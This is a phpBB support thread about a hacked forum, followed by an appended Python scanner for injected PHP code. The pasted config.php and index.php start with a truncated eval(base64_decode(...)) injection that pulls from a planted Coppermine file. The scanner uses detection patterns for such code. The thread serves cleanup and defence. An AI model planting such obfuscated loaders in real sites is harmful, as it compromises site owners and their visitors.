I logged on to my site and went to my phpBB forums and noticed that it was all messed up looking. And I don't know how it got like that. Below is a link to my site and you can see what it looks like and maybe someone can tell me what it might be.
http://www.jonesdesignz.com/phpbb/portal.php
phpbb forums messed up
Forum rules
Temporary forum to obtain support while phpBB.com is offline.
Please use the support forum on phpBB.com
- darcie
- Former Team Member
- Posts: 189
- Joined: Mon Mar 12, 2007 7:32 pm
- Location: Davis, California
- Contact:
Re: phpbb forums messed up
Look at your config.php file and see if there is code after the ?> Check your index.php and portal.php too.
Re: phpbb forums messed up
Config.php File Coding
Index.php File Coding
Code: Select all
<?php /**/eval(base64_decode('[...] XSpcPikvc2knLCckMScuZ21sKCksJGMpO31lbHNle3JldHVybiBnbWwoKS4kYzt9fW9iX3N0YXJ0KCdkZ29iaCcpO319fQ==')); ?>
<?php
// phpBB 3.0.x auto-generated configuration file
// Do not change anything in this file!
$dbms = 'mysql';
$dbhost = 'mysql403.ixwebhosting.com';
$dbport = '';
$dbname = 'Squewhe_phpbb';
$dbuser = 'Squewhe_Admin';
$dbpasswd = '*******';
$table_prefix = 'phpbb_';
$acm_type = 'file';
$load_extensions = '';
@define('PHPBB_INSTALLED', true);
// @define('DEBUG', true);
// @define('DEBUG_EXTRA', true);
?>
Code: Select all
<?php /**/eval(base64_decode('[...] XSpcPikvc2knLCckMScuZ21sKCksJGMpO31lbHNle3JldHVybiBnbWwoKS4kYzt9fW9iX3N0YXJ0KCdkZ29iaCcpO319fQ==')); ?>
<?php
/**
*
* @package phpBB3
* @version $Id: index.php 8479 2008-03-29 00:22:48Z naderman $
* @copyright (c) 2005 phpBB Group
* @license http://opensource.org/licenses/gpl-license.php GNU Public License
*
*/
/**
*/
/**
* @ignore
*/
define('IN_PHPBB', true);
$phpbb_root_path = (defined('PHPBB_ROOT_PATH')) ? PHPBB_ROOT_PATH : './';
$phpEx = substr(strrchr(__FILE__, '.'), 1);
include($phpbb_root_path . 'common.' . $phpEx);
include($phpbb_root_path . 'includes/functions_display.' . $phpEx);
// Start session management
$user->session_begin();
$auth->acl($user->data);
$user->setup('viewforum');
//-- mod : AJAX Chat ----------------------------------------------------
//-- add
include($phpbb_root_path . 'shout.' . $phpEx);
//-- fin mod : AJAX Chat ------------------------------------------------
display_forums('', $config['load_moderators']);
// Set some stats, get posts count from forums data if we... hum... retrieve all forums data
$total_posts = $config['num_posts'];
$total_topics = $config['num_topics'];
$total_users = $config['num_users'];
$l_total_user_s = ($total_users == 0) ? 'TOTAL_USERS_ZERO' : 'TOTAL_USERS_OTHER';
$l_total_post_s = ($total_posts == 0) ? 'TOTAL_POSTS_ZERO' : 'TOTAL_POSTS_OTHER';
$l_total_topic_s = ($total_topics == 0) ? 'TOTAL_TOPICS_ZERO' : 'TOTAL_TOPICS_OTHER';
// Grab group details for legend display
if ($auth->acl_gets('a_group', 'a_groupadd', 'a_groupdel'))
{
$sql = 'SELECT group_id, group_name, group_colour, group_type
FROM ' . GROUPS_TABLE . '
WHERE group_legend = 1
ORDER BY group_name ASC';
}
else
{
$sql = 'SELECT g.group_id, g.group_name, g.group_colour, g.group_type
FROM ' . GROUPS_TABLE . ' g
LEFT JOIN ' . USER_GROUP_TABLE . ' ug
ON (
g.group_id = ug.group_id
AND ug.user_id = ' . $user->data['user_id'] . '
AND ug.user_pending = 0
)
WHERE g.group_legend = 1
AND (g.group_type <> ' . GROUP_HIDDEN . ' OR ug.user_id = ' . $user->data['user_id'] . ')
ORDER BY g.group_name ASC';
}
$result = $db->sql_query($sql);
$legend = '';
while ($row = $db->sql_fetchrow($result))
{
$colour_text = ($row['group_colour']) ? ' style="color:#' . $row['group_colour'] . '"' : '';
if ($row['group_name'] == 'BOTS')
{
$legend .= (($legend != '') ? ', ' : '') . '<span' . $colour_text . '>' . $user->lang['G_BOTS'] . '</span>';
}
else
{
$legend .= (($legend != '') ? ', ' : '') . '<a' . $colour_text . ' href="' . append_sid("{$phpbb_root_path}memberlist.$phpEx", 'mode=group&g=' . $row['group_id']) . '">' . (($row['group_type'] == GROUP_SPECIAL) ? $user->lang['G_' . $row['group_name']] : $row['group_name']) . '</a>';
}
}
$db->sql_freeresult($result);
// Generate birthday list if required ...
$birthday_list = '';
if ($config['load_birthdays'] && $config['allow_birthdays'])
{
$now = getdate(time() + $user->timezone + $user->dst - date('Z'));
$sql = 'SELECT user_id, username, user_colour, user_birthday
FROM ' . USERS_TABLE . "
WHERE user_birthday LIKE '" . $db->sql_escape(sprintf('%2d-%2d-', $now['mday'], $now['mon'])) . "%'
AND user_type IN (" . USER_NORMAL . ', ' . USER_FOUNDER . ')';
$result = $db->sql_query($sql);
while ($row = $db->sql_fetchrow($result))
{
$birthday_list .= (($birthday_list != '') ? ', ' : '') . get_username_string('full', $row['user_id'], $row['username'], $row['user_colour']);
if ($age = (int) substr($row['user_birthday'], -4))
{
$birthday_list .= ' (' . ($now['year'] - $age) . ')';
}
}
$db->sql_freeresult($result);
}
// Assign index specific vars
$template->assign_vars(array(
'TOTAL_POSTS' => sprintf($user->lang[$l_total_post_s], $total_posts),
'TOTAL_TOPICS' => sprintf($user->lang[$l_total_topic_s], $total_topics),
'TOTAL_USERS' => sprintf($user->lang[$l_total_user_s], $total_users),
'NEWEST_USER' => sprintf($user->lang['NEWEST_USER'], get_username_string('full', $config['newest_user_id'], $config['newest_username'], $config['newest_user_colour'])),
'LEGEND' => $legend,
'BIRTHDAY_LIST' => $birthday_list,
'FORUM_IMG' => $user->img('forum_read', 'NO_NEW_POSTS'),
'FORUM_NEW_IMG' => $user->img('forum_unread', 'NEW_POSTS'),
'FORUM_LOCKED_IMG' => $user->img('forum_read_locked', 'NO_NEW_POSTS_LOCKED'),
'FORUM_NEW_LOCKED_IMG' => $user->img('forum_unread_locked', 'NO_NEW_POSTS_LOCKED'),
'S_LOGIN_ACTION' => append_sid("{$phpbb_root_path}ucp.$phpEx", 'mode=login'),
'S_DISPLAY_BIRTHDAY_LIST' => ($config['load_birthdays']) ? true : false,
'U_MARK_FORUMS' => ($user->data['is_registered'] || $config['load_anon_lastread']) ? append_sid("{$phpbb_root_path}index.$phpEx", 'mark=forums') : '',
'U_MCP' => ($auth->acl_get('m_') || $auth->acl_getf_global('m_')) ? append_sid("{$phpbb_root_path}mcp.$phpEx", 'i=main&mode=front', true, $user->session_id) : '')
);
// Output page
page_header($user->lang['INDEX']);
$template->set_filenames(array(
'body' => 'index_body.html')
);
page_footer();
?>
Last edited by darcie on Wed Feb 11, 2009 3:33 am, edited 1 time in total.
Reason: database password removed
- darcie
- Former Team Member
- Posts: 189
- Joined: Mon Mar 12, 2007 7:32 pm
- Location: Davis, California
- Contact:
Re: phpbb forums messed up
http://www.phpbb.com/community/viewtopi ... 543171#iit
My board has been hacked, what do I do? #
Please do the following before making any modifications to your board (this includes changing passwords, editing files, running the admin toolkit, etc.):
1) Save a copy of the files (simply create a local copy of the files on the server).
2) Save a copy of the database.
3) Save the server access logs for the time of the hack (they may be available in the 'logs' directory on the server, in your host's control panel or only by request directly from your host).
4) File a report in the incident tracker. Attach the items from steps 1-3 when you file the report or upload them to a secure location for the incident investigation team to download. Please do not start a new topic on the board; the proper place for incident reports is the tracker.
Re: phpbb forums messed up
OK, so you're saying my site has been hacked. And I'm kinda dumb on the phpBB stuff, so I might need your help on understanding some of this stuff.
- darcie
- Former Team Member
- Posts: 189
- Joined: Mon Mar 12, 2007 7:32 pm
- Location: Davis, California
- Contact:
Re: phpbb forums messed up
Through some means, someone has inserted that code. It translates to something pulling from a coppermine gallery at stevejonesplumbing.com/Coppermine/albums/Bathroom Remodels/copper.php.
The instructions I gave you say to make a backup of everything: the files and the database. If you can access the server logs in your hosting control panel, please save those or ask your host. File a report through the link to the incident tracker. This appears to be an exploit somewhere other than phpBB, but, as we well know, holes in other applications can affect your board as well.
Once you have made backups of everything, clear those files of that code, or upload brand new files. Check into updates for any other applications.
Re: phpbb forums messed up
Well, see, that is my parents' site http://www.stevejonesplumbing.com
- darcie
- Former Team Member
- Posts: 189
- Joined: Mon Mar 12, 2007 7:32 pm
- Location: Davis, California
- Contact:
Re: phpbb forums messed up
Well, they're on the same server, right? Just as our phpBB install was attacked through another application, yours is too. You'll need to have them update Coppermine, or make sure it is appropriately secured. The copper.php file is probably not one that should be there, as I saw it in other similar attacks recently.
Re: phpbb forums messed up
Yeah, they're on the same server, 'cause I used one of their free coupon things to make my site. I don't want their site to get messed up. So do you think that if I delete that copper.php file it should be fine, or what should I do?
- darcie
- Former Team Member
- Posts: 189
- Joined: Mon Mar 12, 2007 7:32 pm
- Location: Davis, California
- Contact:
Re: phpbb forums messed up
Yeah, more likely it is their site messing yours up.
As there was just a Coppermine security update released within the last week, make sure they update. Clean out all of your forum files for your own site. But if you don't patch other holes, this will likely happen again.
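The check described in this thread (an `eval(base64_decode(...))` block injected at the top of a file, or content after the closing `?>`) can be run over a whole directory tree before cleaning. The sketch below is an added example, not part of the original thread or of phpBB's tooling; the function names and the sample files are constructed for illustration, and the payload is only decoded for reading, never executed.

```python
import base64
import re
from pathlib import Path

# The injected prefix seen in the thread: eval(base64_decode('...')).
# PHP function names are case-insensitive, hence IGNORECASE.
INJECT_RE = re.compile(
    rb"eval\s*\(\s*base64_decode\s*\(\s*(['\"])([A-Za-z0-9+/=\s]+)\1\s*\)\s*\)",
    re.IGNORECASE,
)

def inspect_php(data: bytes) -> dict:
    """Inspect one file's bytes. The payload is decoded for reading, never run."""
    found = {"eval_base64": [], "trailing_after_close": b""}
    for m in INJECT_RE.finditer(data):
        blob = b"".join(m.group(2).split())
        try:
            decoded = base64.b64decode(blob, validate=True)
        except ValueError:  # truncated or damaged blob
            decoded = b"<undecodable>"
        found["eval_base64"].append((m.start(), decoded))
    # Anything other than whitespace after the last ?> is worth a look.
    close = data.rfind(b"?>")
    if close != -1:
        found["trailing_after_close"] = data[close + 2:].strip()
    return found

def scan_tree(root: str) -> dict:
    """Map each flagged *.php path under root to its findings."""
    hits = {}
    for path in sorted(Path(root).rglob("*.php")):
        found = inspect_php(path.read_bytes())
        if found["eval_base64"] or found["trailing_after_close"]:
            hits[str(path)] = found
    return hits

# Constructed samples (harmless payload), shaped like the files in the thread.
SAMPLE_PAYLOAD = b"/* constructed placeholder payload */"
SAMPLE_INFECTED = (
    b"<?php /**/eval(base64_decode('" + base64.b64encode(SAMPLE_PAYLOAD) + b"')); ?>\n"
    b"<?php\n$dbms = 'mysql';\n?>\n<!-- constructed trailing content -->\n"
)
SAMPLE_CLEAN = b"<?php\n$dbms = 'mysql';\n?>\n"

if __name__ == "__main__":
    for offset, decoded in inspect_php(SAMPLE_INFECTED)["eval_base64"]:
        print(f"eval(base64_decode(...)) at byte {offset}: {decoded!r}")
```

Files that legitimately mix PHP and HTML will also show trailing content, so treat that finding as a prompt for review; the `eval(base64_decode(` match is the stronger signal. Run it against the saved copy of the files so the evidence on the server stays untouched.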